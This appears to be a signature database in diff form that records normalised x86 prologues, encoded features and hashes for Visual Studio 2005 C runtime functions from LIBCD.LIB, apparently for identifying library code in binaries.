+_fopen,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",HoIHagAAAAAAAAAA,nIZROORSvJ+S9NEBpBdjb+RSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTikF2NvxKDSCQAAAAAAAAAAkvTRAeRSvJ87j6vlO4+r5eRSvJ8AAAAApBdjb+RSvJ+S9NEBkvTRAeRSvJ87j6vlmVConMSg0gkAAAAAeF2amJlQqJwNzMABO4+r5eRSvJ8AAAAA5FK8n6QXY2+chlE4kvTRAeRSvJ87j6vlma5ZK5yGUTgAAAAAnIZROORSvJ+S9NEB5FK8n6QXY294XZqYkvTRAeRSvJ87j6vlO4+r5eRSvJ8AAAAA5FK8n5yGUTikF2NvDczAAcSg0gkAAAAA,57ee97c53bb1b938b8abd2719fbed86ea1a7a5bd,VS2005,LIBCD.LIB
+__fsopen,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",nIZROORSvJ+S9NEB5FK8n6QXY294XZqYpBdjb+RSvJ+S9NEBxKDSCQAAAAAAAAAA5FK8n5yGUTikF2NvmVConMSg0gkAAAAAkvTRAeRSvJ87j6vlO4+r5eRSvJ8AAAAApBdjb+RSvJ+S9NEBO4+r5eRSvJ8AAAAAkvTRAeRSvJ87j6vleF2amJlQqJwNzMABO4+r5eRSvJ8AAAAA5FK8n6QXY2+chlE4kvTRAeRSvJ87j6vlma5ZK5yGUTgAAAAAnIZROORSvJ+S9NEBkvTRAeRSvJ87j6vlO4+r5eRSvJ8AAAAA5FK8n5yGUTikF2NvDczAAcSg0gkAAAAA,[],baa24a38ef2c1297cebf13d7bef89a9c48b206ea,VS2005,LIBCD.LIB
+__wtmpnam,"PUSH EBP\nMOV EBP,ESP\nXOR R32,R32\nMOV R16,WORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",XqODJybu4WUAAAAAum9HmJyGUTj31AVtfB1DBbpvR5gAAAAAXqODJybu4WUAAAAAXqODJ7pvR5gAAAAAoDc6oQDh1msAAAAAJu7hZQDh1msAAAAA99QFbbpvR5heo4Mn9CnuCKA3OqEAAAAAnIZROLH25fL0Ke4I68HuvvfUBW18HUMF99QFbV6jgydeo4Mnsfbl8qA3OqEAAAAAAOHWawAAAAAAAAAA,[],879689c20b082f2a67ba68e0f29689fc50634444,VS2005,LIBCD.LIB
+__flushall,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",p08ongAAAAAAAAAA,p+49vJyGUTi4bq45I4+aQBvD+8YAAAAAXqODJzUWchMAAAAAG8P7xpyGUTi4bq45NRZyE6fuPbwAAAAAR44YVDUWchPngprGnIZRODUWchNHjhhUnIZROEFF0BugNzqhnIZROJyGUTi6AJtioDc6oU+LzAoAAAAA54KaxjUWchMAAAAAuG6uOTUWchMbfI4eQUXQG0+LzAoAAAAAG3yOHjUWchOchlE4T4vMCgAAAAAAAAAAugCbYl6jgycAAAAA,e99c248e439105f6683f3189058aa878cadfc4f3,VS2005,LIBCD.LIB
+_fflush,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nNEG R32\nSBB R32,R32\nJMP SHORT CONST",cMiU5C8CckJ8HUMFxJKmaADh1msAAAAAfB1DBQDh1msAAAAAbRuS6k+LzAqUKiUwT4vMCgAAAAAAAAAAAOHWawAAAAAAAAAALwJyQm0bkurEkqZolColMADh1msAAAAA,[],d864e1c32f4ebd9bfcde07de793ed19bf84667ab,VS2005,LIBCD.LIB
+__flush,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]\nSUB R32,DWORD PTR DS:[R32+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",XqODJ8quUm4AAAAAbRuS6l6jgycAAAAA6FJMhwAAAAAAAAAAvxktDuhSTIdtG5LqsAeMvsquUm6/GS0Oyq5SbgAAAAAAAAAA/MZ+6cquUm5tG5LqbRuS6squUm6wB4y+,[],0ae8e181ae085071ba22a280629190849695d21f,VS2005,LIBCD.LIB
+_time,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],-1\nJCC CONST",HSMv7dUc1LbxZLvObrSS29Uc1LbxZLvOnIZROFW1VpJVtVaSjumJqNYjJjvoLonB33Cyf7+TuL0AAAAADjXzm9YjJjuO6YmoVbVWkl6jgycAAAAA8WS7ztUc1LYAAAAAiw0UTFW1VpJSZ38G6C6JwdYjJjvfcLJ/6C6JwdYjJjsONfOb1iMmOx0jL+2LDRRM1RzUtgAAAAAAAAAAVbVWkm60ktsAAAAAUmd/BlW1VpKchlE4v5O4vdUc1LbxZLvOQm+5iNYjJjvoLonBXqODJ260ktsAAAAA,[],087fd3d80b742ad76e69d20a33bf594dd4e9f2a0,VS2005,LIBCD.LIB
+_towupper,"PUSH CONST\nMOV R16,WORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",eFVteSW5+eEZ8xfWJbn54R2cRa6WfJuvlnybr0+LzAoAAAAAJAPDnXhVbXmbORlvwg3kzCQDw539yWqbCBBBppZ8m68AAAAAlnybr0+LzAoAAAAAmzkZb5Z8m6+bORlvlnybr0+LzAoAAAAAGfMX1iW5+eGWfJuv/clqm0+LzAoAAAAAHZxFrk+LzAoAAAAAT4vMCgAAAAAAAAAAmzkZb5Z8m68IEEGm,[],38bda422c844732991984488c98938f75c08b3a1,VS2005,LIBCD.LIB
+_abs,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",jLRRTq39GrlxWpQ6rf0audUc1LYAAAAAcVqUOtUc1LYAAAAA1RzUtgAAAAAAAAAA,[],7e2da614291832dd64d6a2f7f8b1e36c43b256bb,VS2005,LIBCD.LIB
+__mkdir,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nJMP SHORT CONST",Ju7hZU+LzAoAAAAAlnPwX5yGUTgAAAAA6M8b6ZZz8F9sZhucnIZROCbu4WWZeO5vmXjub0+LzAoAAAAAT4vMCgAAAAAAAAAAbGYbnJyGUTgAAAAA,[],b99b91d84a9b6452b9b29ce9c35315e329ff813f,VS2005,LIBCD.LIB
+__memccpy,"MOV R8,BYTE PTR SS:[ESP+CONST]\nPUSH R32\nTEST R32,CONST\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nJCC CONST",Ol4mhoGGgcKewLEegYaBwj/DesUAAAAAT4vMCgAAAAAAAAAAnsCxHj/DesW7tlwsl9p7lLE/Nsw6XiaGdqzq7D/DesWX2nuUAcDPEE+LzAqej6tgu7ZcLDpeJoaxPzbMsT82zE+LzAoAAAAAno+rYDpeJoZ2rOrsP8N6xQAAAAAAAAAA,[],fd71f70c7d7640e1521ab5c0d163cdd2af3c67a6,VS2005,LIBCD.LIB
+__mbsninc,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,R32",d5iZ6wDh1msAAAAAcMiU5HeYmesNzMABDczAAQDh1msAAAAAAOHWawAAAAAAAAAA,[],072dadf4297595b8ffe165392ed75268142daded,VS2005,LIBCD.LIB
+___dtold,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nSHL R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]\nAND R32,CONST\nNEG R32\nSBB R32,R32",nIZROIGx9fe+FlpPT4vMCgAAAAAAAAAAx5itKpyGUTiLDRRMiw0UTOPKhXReo4MnvhZaT0+LzAoAAAAAhDuwZ0+LzAoAAAAAgbH194rGB74AAAAA5WrCLG0bkuoAAAAAXqODJypkKIcAAAAA48qFdIrGB74AAAAAisYHvoQ7sGflasIsnIZROIGx9fechlE4bRuS6oQ7sGflasIsKmQoh4Q7sGflasIs,[],b57e5fa35621e64e1d64bca86f74417a749a7cdb,VS2005,LIBCD.LIB
+__fltout,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",w4XffAAAAAAAAAAA,5WrCLG0bkuoAAAAAXqODJ+aHxB4AAAAA48qFdIrGB74AAAAAisYHvoQ7sGflasIshDuwZ0+LzAoAAAAAnIZROIGx9fechlE4bRuS6oQ7sGflasIs5ofEHorGB74AAAAAnIZROIGx9fe+FlpPT4vMCgAAAAAAAAAAx5itKpyGUTiLDRRMvhZaT0+LzAoAAAAAgbH194rGB74AAAAAiw0UTOPKhXReo4Mn,6e58e7cf799cb7d706c7b7bbee8a16a25a831269,VS2005,LIBCD.LIB
+__getcwd,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST",0TQKagAAAAAAAAAA,XqODJ2QwsAQAAAAAnOHYJJyGUTgAAAAAg65DXmQwsAS88y1kLwJyQhT+ecQh+jsBIfo7AU+LzAoAAAAA0TmH1ZO/AIQAAAAAvPMtZE+LzAoAAAAAT4vMCgAAAAAAAAAAvPMtZE+LzAoAAAAAFP55xJyGUTgAAAAADczAAU+LzAoAAAAAUgVNspO/AIQAAAAAincMmIOuQ16DrkNeMbv6YZzh2CQvAnJCnIZROA3MwAF2e+A0ZDCwBE+LzAoAAAAAk78AhF6jgye88y1kdnvgNIp3DJgNzMABg65DXlIFTbLROYfV,71a56ec09c9305cfa097ac4481ac1896ce7e7828,VS2005,LIBCD.LIB
+__getdcwd,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",XqODJ2QwsAQAAAAAnOHYJJyGUTgAAAAAg65DXmQwsAS88y1k0TmH1ZO/AIQAAAAAIfo7AU+LzAoAAAAAvPMtZE+LzAoAAAAAT4vMCgAAAAAAAAAAvPMtZE+LzAoAAAAADczAAU+LzAoAAAAAFP55xJyGUTgAAAAALwJyQhT+ecQh+jsB7fAl/l6jgye88y1kincMmIOuQ16DrkNeMbv6YZzh2CQvAnJCnIZROA3MwAF2e+A0ZDCwBE+LzAoAAAAAk78AhF6jgye88y1kdnvgNIp3DJgNzMABg65DXu3wJf7ROYfV,[],04afdd64f1b68ff3f3a8edc174f07a7d31fe4cf0,VS2005,LIBCD.LIB
+__validdrive,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",9G7EIA3MwAGchlE4nIZROCqzQt4NzMABVaatKPRuxCCXcVGeDczAAU+LzAoAAAAAKrNC3k+LzAoAAAAAT4vMCgAAAAAAAAAAl3FRnk+LzAoAAAAA,[],beb1dc063899c83821724fd9fa4fecad8e6f71c2,VS2005,LIBCD.LIB
+__heapused,"PUSH EBP\nMOV EBP,ESP\nMOV DWORD PTR DS:[0],CONST\nXOR R32,R32\nPOP EBP\nRETN",hvylJwAAAAAAAAAA,[],216ddb10db842e35c9fc90c882919ee3475c9dee,VS2005,LIBCD.LIB
+__tempnam,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR DS:[R32+R32+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST",XqODJ5yGUTgAAAAAbUkFBpyGUTix9uXycVqUOpyGUTgAAAAAT6vMHJyGUTi9np4ZT6vMHANqyEA1FnITnIZROM6NkPG9np4Zsfbl8pyGUTgAAAAABoJUlJyGUTi9np4ZvZ6eGZyGUTjOjZDxnIZROB+NSTiNqU/qNRZyEwP8GHoAAAAA4DwTOI8KcdUkA8OdjalP6h+NSTgAAAAAzo2Q8TqNu5f0Ke4IH41JOHCc4w0+U6QMvZ6eGZyGUTga72UOk90UgV6jgyex9uXyEfxlwDUWchNPq8wc9CnuCJyGUTgAAAAAJAPDnY8KcdUD/Bh6Gu9lDpyGUTgAAAAAOo27l50eNGIR/GXAA/wYegAAAAAAAAAAPlOkDOA8Ezipw6YPnIZROJyGUThPq8wcnIZROJ0eNGIR/GXAcJzjDeA8Ezipw6YPqcOmDwP8GHoAAAAAnR40YjUWchNPq8wcjwpx1eA8Ezipw6YPsfbl8l6jgycAAAAAvZ6eGZyGUThxWpQ6A2rIQG1JBQaT3RSB,[],4c14f3b3cd1ae09c85cf860eb3fd4a7cadaf4903,VS2005,LIBCD.LIB
+___tzset,"CALL CONST\nMOV R32,DWORD PTR DS:[0]\nADD R32,CONST\nMOV DWORD PTR DS:[0],R32\nPOP EBP\nRETN",AOHWawAAAAAAAAAAOWijNADh1mskA8OdJAPDnQDh1ms4MJbLODCWywAAAAAAAAAA,[],d2339f501cd2903047090dccbf51440cf7c97771,VS2005,LIBCD.LIB
+__tzset,"MOV R32,DWORD PTR DS:[0]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",zBcvS4dJ516chlE4iQyZSk+LzAoAAAAAnIZROGo/TOdhashzbUkFBshSX9dtSQUGbUkFBpyGUTjdkkH1YWrIczUWchMAAAAAXrC7BWXRRxFDbE7HbUkFBpyGUTjIUl/XpvBKxYdJ516chlE43ZJB9W1JBQYAAAAANRZyE0+LzAoAAAAAaj9M5zUWchMAAAAAlX3sf4i0Tk6Fqwy1bUkFBpgCUj7IUl/XNRZyE0+LzAoAAAAAaj9M50+LzAoAAAAApBdjbzUWchMkA8OdyFJf121JBQYAAAAAT4vMCgAAAAAAAAAAJAPDnbxn1D1UzOTomAJSPpyGUTjQGfuIQ2xOx8wXL0skA8Odv+7ln6QXY293u8VXbUkFBpyGUThtSQUGhasMtW1JBQYAAAAAnIZROIdJ517svAbQ0Bn7iG1JBQZtSQUG7LwG0GYs/iUAAAAAZdFHEcwXL0skA8OdyFJf121JBQYAAAAANRZyE0+LzAoAAAAAVMzk6Lxn1D01FnITvGfUPZV97H81FnITJAPDncwXL0tT6kxonIZROF3Ieg5d5RGbZiz+JWo/TOechlE4XeURm13Ieg4AAAAAU+pMaKbwSsUAAAAAh0nnXmo/TOechlE4bUkFBm1JBQZtSQUGXch6Dmo/TOeJDJlKiLROTm1JBQYAAAAAbUkFBpgCUj5tSQUGbUkFBm1JBQbIUl/Xd7vFVzUWchNesLsFyFJf121JBQYAAAAA,[],3e694575358c6edfd12677f1396b1a82e3a0b482,VS2005,LIBCD.LIB
+__isindst,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nCMP DWORD PTR DS:[0],0\nJCC CONST",ZnkxNU+LzAoAAAAADczAAU+LzAoAAAAAI+rK7tFIlKXWoZ3WI+rK7iPqyu5meTE11qGd1ou3EyzRSJSlZnkxNU+LzAoAAAAAUN+gCT1uZ9SO3O35PW5n1Iu3EywAAAAAI+rK7l6jgycj6sruXqODJ4u3EywAAAAA0UiUpUy2ZdRl0UcRTLZl1CPqyu4j6sruI+rK7l6jgyf8xKCqZdFHEVDfoAmO3O35/MSgqk+LzAoAAAAAtFCxye6IrP7uiKz+7ois/g3MwAGXcVGejtzt+WXRRxEAAAAAXqODJ7RQsckAAAAAI+rK7pdxUZ4j6srul3FRnk+LzAoAAAAADczAAU+LzAoAAAAAI+rK7iPqyu6XcVGel3FRnk+LzAoAAAAAl3FRnk+LzAoAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAI+rK7rRQsckj6sruZdFHET1uZ9SO3O35i7cTLCPqyu4j6sruchMCgCPqyu5meTE1I+rK7rRQsckNzMABjtzt+V6jgycAAAAAI+rK7mZ5MTUj6sru7ois/ibu4WWXcVGe,[],a68a09129f88fccd4ba10745d92583c489ecd1ea,VS2005,LIBCD.LIB
+__strdup,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",jLRRTjaIts4NzMABJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAADczAAU+LzAoAAAAANoi2zibu4WVAPBIrQDwSK0+LzAoAAAAA,[],fe02a539d466137d5447d6c089b6c5fbd0a9b9b0,VS2005,LIBCD.LIB
+_wscanf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",nIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUThkdeJ8kvTRAeRSvJ87j6vlZHXifAAAAAAAAAAAZWXpEZyGUTgAAAAA,[],0090ff9779e5db1256e40c0794420119a9c573e0,VS2005,LIBCD.LIB
+__fputchar,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR DS:[CONST]\nSUB R32,CONST\nMOV DWORD PTR DS:[CONST],R32\nCMP DWORD PTR DS:[CONST],0\nJCC CONST",maVmxNUc1LYAAAAAWvaZaNUc1LYAAAAA1RzUtgAAAAAAAAAAB/TruZmlZsRa9plo,[],02d98f446a586c1e102e7ced346dd2d601b7c665,VS2005,LIBCD.LIB
+_putchar,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",NV3SuwAAAAAAAAAA,B/TruZmlZsRa9plomaVmxNUc1LYAAAAAWvaZaNUc1LYAAAAA1RzUtgAAAAAAAAAA,a1cd9a193cdca3f0d3bd9876c6debf52e442d563,VS2005,LIBCD.LIB
+__fsqrt,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nFLD QWORD PTR SS:[EBP+CONST]\nFSQRT",d7Ne/gAAAAAAAAAA,[],4c701f8691290cd5d4899bf6c5adf873bb391706,VS2005,LIBCD.LIB
+__wputenv,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",pkG9WItYnCivJ1dcrydXXE+LzAoAAAAAxJKmaE+LzAoAAAAAEIVrf6ZBvVivJ1dcwd0IFr2qYrjEkqZoxJKmaE+LzAoAAAAAxJKmaE+LzAoAAAAAvapiuNkBAx7EkqZoxJKmaE+LzAoAAAAAJu7hZU+LzAoAAAAAi1icKNFIlKWvJ1dcT4vMCgAAAAAAAAAArydXXE+LzAoAAAAA2QEDHnTA+HDEkqZorydXXE+LzAoAAAAAdMD4cCbu4WXEkqZo0UiUpSbu4WXB3QgW,[],26b3a5c8f7dbb347f25a19017428c8fb3e2ba00e,VS2005,LIBCD.LIB
+__vsnwprintf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",p7RcJIzQu3qYvk8JnIZROORSvJ+S9NEBmL5PCbs9SYUAAAAAdYMGr5yGUTichlE45FK8n5yGUTichlE4kvTRAeRSvJ91gwavFnKdaKe0XCQAAAAAnIZROORSvJ+S9NEBjNC7eqe0XCQAAAAAuz1JhQAAAAAAAAAA5FK8n5yGUTjY8ci7kvTRAeRSvJ87j6vlmY/2juRSvJ+S9NEB2PHIu4zQu3oWcp1ojNC7ers9SYUAAAAAO4+r5eRSvJ8AAAAA,[],c20fa328f59f5c61d74e6125fd32eae59f7402ba,VS2005,LIBCD.LIB
+__mbsstr,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP CONST",17Bks+HZBXnh2QV5+E38KuHZBXlenfrEWR/3qOHZBXkAAAAA4dkFecBBQJegNzqhJu7hZS+iRdUAAAAAL6JF1QAAAAAAAAAA4dkFeeHZBXnh2QV54dkFeSbu4WWDrkNeK4njHy+iRdUAAAAAoDc6oS+iRdUAAAAAXp36xOHZBXkAAAAAwEFAl+HZBXkAAAAA4dkFeeHZBXn4Tfwqg65DXibu4WXXsGSzeTzoLFkf96grieMf,[],277ad0103a7b2a6df63164c59e0f4c16e72516f2,VS2005,LIBCD.LIB
+___crtGetStringTypeA,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",I2GQSpyGUTgAAAAAnIZROGEAw/y0LljUDczAATEuOrEAAAAAtC5Y1DEuOrEAAAAAPhvZjDEuOrEAAAAAYQDD/DEuOrEAAAAAJu7hZTEuOrEAAAAAMS46sQAAAAAAAAAAS4HbzOGeynIZpmb/0UiUpSbu4WWchlE4nIZROBGTm44Nbef8GaZm/yQDw50AAAAADW3n/CNhkEpmeTE1EZObjiNhkEpmeTE14Z7KcmZ5MTUZpmb/nIZROIrfhOkNzMABDczAATEuOrEAAAAAit+E6T4b2YwNzMABGaZm/yQDw50AAAAAJAPDndFIlKWchlE4ZnkxNTEuOrEAAAAAZnkxNTEuOrEAAAAALaOCjSQDw51LgdvM,[],129cde7da7790daab5322491eb85cdbe5f503a30,VS2005,LIBCD.LIB
+__findnexti64,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",MhSYrYPygRlx/sHorydXXC+iRdUAAAAAL6JF1QAAAAAAAAAAiUXy0y+iRdUAAAAAcf7B6AAAAAAAAAAAg/KBGa8nV1wAAAAArCn9MIlF8tMyFJit,[],94cbc92a1f53299d8f8f383172a9db3ddfd68049,VS2005,LIBCD.LIB
+__findfirsti64,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",MhSYrYPygRlx/sHorydXXC+iRdUAAAAAL6JF1QAAAAAAAAAA6KkcrC+iRdUAAAAAcf7B6AAAAAAAAAAAkXOYtuipHKwyFJitg/KBGa8nV1wAAAAA,[],6c91a096a0bea508e09abf51532b0cb5b74b5f33,VS2005,LIBCD.LIB
+_wcscmp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nTEST R32,R32\nJCC CONST",JCl+BpyGUTghIEEl1RzUtgAAAAAAAAAAnIZROJyGUTj0Ke4IF4HCCpyGUTghIEEl9CnuCNUc1LYAAAAAISBBJZyGUThenfrEXp36xBeBwgoAAAAAnIZRONUc1LbgeCdU4HgnVAAAAAAAAAAA,[],9a96b99ff6e03b83105e2e5cb3dfa2a276274b48,VS2005,LIBCD.LIB
+__spawnlpe,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",kvTRAeRSvJ91gwavQbg/NANqB5leo4MncTme6QNqB5leo4MndYMGr6QXY2+chlE45FK8n6QXY2+chlE4kvTRAeRSvJ91gwav5FK8n6QXY29xOZ7pA2oHmQAAAAAAAAAAnIZROORSvJ+S9NEBa11M0+RSvJ+S9NEBdYMGr5yGUTikF2Nv5FK8n5yGUTikF2NvkvTRAeRSvJ91gwavnIZROORSvJ+S9NEBpBdjb+RSvJ+S9NEBdYMGr5yGUTikF2Nv5FK8n5yGUTikF2NvkvTRAeRSvJ91gwavXqODJ0G4PzQAAAAAdYMGr6QXY29xOZ7ppBdjb+RSvJ+S9NEB,[],98ddf65c70f5bc47f632c56e1394e34b1a28ba4e,VS2005,LIBCD.LIB
+__wcsnset,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nTEST R32,R32\nJCC CONST",6EX5t30JSDQAAAAAfQlINNUc1LYhIEEl1RzUtgAAAAAAAAAAISBBJdUc1LbnTIJq50yCan0JSDQAAAAA,[],0ddcd807a798b63c613b65c544e319679698212a,VS2005,LIBCD.LIB
+__ismbcalpha,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32*2+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",1RzUtgAAAAAAAAAAaz/TBFJnfwYNzMABDczAAU+LzAoAAAAAT4vMCgAAAAAAAAAAmdT0gGs/0wRmeTE1Umd/BnbbIJ4e0JUB9CnuCNUc1LYAAAAASsDrlhLljK+Z1PSAHtCVAXbbIJ70Ke4IZnkxNU+LzAoAAAAAdtsgnk+LzAoAAAAAoDc6oU+LzAoAAAAAJElloOB4J1T0Ke4I4HgnVAAAAAAAAAAA9CnuCKA3OqEAAAAAEuWMr+B4J1QkSWWg,[],cf39b6be38f55786fe6f5e5ece26037e94c06b47,VS2005,LIBCD.LIB
+?name@type_info@@QBEPBDXZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[R32+CONST],0\nJCC CONST",0GGTjQAAAAAAAAAAA7Cv9FI16OoAAAAASCQihgAAAAAAAAAAUjXo6tBhk41YhTRwj/ukY0gkIoYDsK/0WIU0cD7KhtkAAAAAPsqG2VI16OoAAAAA,[],25bb67d0125db7bc8070381754798fbd430313c2,VS2005,LIBCD.LIB
+__openfile,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",kvTRAeRSvJ87j6vl789LTmjaqfppzQYAMJ37VpyGUTgAAAAARsXLupZz8F8AAAAAkvTRAeRSvJ87j6vllnPwXzUWchMAAAAAxKDSCQAAAAAAAAAA5FK8n5yGUTiO9iqfNRZyE+/PS04AAAAAP2HSMJZz8F/Bm6AunIZROORSvJ+S9NEBac0GAGjaqfo/YdIwJw91EkbFy7onD3USO4+r5eRSvJ8AAAAAJw91Eo9lDoFeo4MnXqODJ2Z5MTUAAAAAwZugLgAAAAAAAAAADczAAcSg0gkAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTichlE45lxmNMSg0gkAAAAAnIZROORSvJ+S9NEBj2UOgZZz8F8AAAAAkvTRAeRSvJ87j6vlj2UOgZZz8F8AAAAA5FK8n5yGUTichlE4jvYqn49lDoEnD3USO4+r5eRSvJ8AAAAAaNqp+uZcZjQNzMABZnkxNcSg0gkAAAAAnIZROORSvJ+S9NEBlnPwX+/PS04AAAAA,[],4e90d40b31faeb29be249e7f96603058466ede62,VS2005,LIBCD.LIB
+__87except,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nMOV DWORD PTR SS:[EBP+CONST],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",nIZROE+LzAqHxmiiq5J8M2WJJ0AAAAAAtqCaPQAAAAAAAAAAnIZROOPIDy6chlE4h8Zook+LzAoAAAAAZYknQJyGUTgkA8Odl+CQsZyGUTgAAAAAJAPDnZyGUTiX4JCxJUU05KuSfDMAAAAAlnPwX2nNBgAAAAAAXqODJyVFNOQAAAAAac0GAGWJJ0CAY+vQ48gPLquSfDMAAAAAT4vMCgAAAAAAAAAAincMmOPIDy6chlE4gGPr0GWJJ0CKdwyYFEckypZz8F+2oJo9nIZROOPIDy5eo4Mn,[],b40d74425e649c7d2ae0f6040814ebf90db8fe9d,VS2005,LIBCD.LIB
